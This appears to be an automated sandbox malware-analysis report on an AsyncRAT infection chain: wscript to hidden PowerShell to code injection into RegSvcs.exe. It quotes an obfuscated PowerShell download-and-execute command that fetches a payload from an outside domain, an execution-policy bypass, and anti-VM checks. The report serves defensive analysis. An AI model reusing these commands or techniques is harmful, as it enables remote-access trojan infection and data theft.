                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                Yara detected AsyncRAT
                Source: Yara matchFile source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: powershell.exe, 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3568Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6269Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3907Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5867Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8177Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6396Thread sleep count: 3907 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6396Thread sleep count: 5867 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5868Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: RegSvcs.exe, 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                Source: RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                Source: wscript.exe, 00000000.00000003.1659330673.000002092EA47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092E9A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659367243.000002092E9DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000001.00000002.1748798903.0000021EA6150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 192.185.141.13 443Jump to behavior
                .NET source code references suspicious native API functions
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, Native.csReference to suspicious API methods: hZtBkRIAsdEfXyYT8l.DKNdSqYsy(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), eNT4yUcAs2TV1EOUTN.DKNdSqYsy(typeof(CreateApi).TypeHandle, eNT4yUcAs2TV1EOUTN.NP4OpjU4s), hZtBkRIAsdEfXyYT8l.mQhtqTkRs)
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, Native.csReference to suspicious API methods: hZtBkRIAsdEfXyYT8l.DKNdSqYsy(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), eNT4yUcAs2TV1EOUTN.DKNdSqYsy(typeof(CreateApi).TypeHandle, eNT4yUcAs2TV1EOUTN.NP4OpjU4s), hZtBkRIAsdEfXyYT8l.mQhtqTkRs)
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, PE.csReference to suspicious API methods: Native.WriteProcessMemory(processInformation.ProcessHandle, num10 + num16, array3, array3.Length, ref bytesWritten)
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, PE.csReference to suspicious API methods: Native.ReadProcessMemory(processInformation.ProcessHandle, num5 + 8, ref buffer2, 4, ref bytesWritten)
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, PE.csReference to suspicious API methods: x42mfHCtV6jaJIpPla7(Native.VirtualAllocEx, processInformation.ProcessHandle, num6, length, 12288, 64)
                Bypasses PowerShell execution policy
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
                Injects a PE file into a foreign processes
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D94008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]];$a123='iex(new-object net.w';$b456='ebclient).downlo';[byte[]];$c789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.replace('-@-@-@-$-%^','adstring');[byte[]];iex($a123+$b456+$c789)
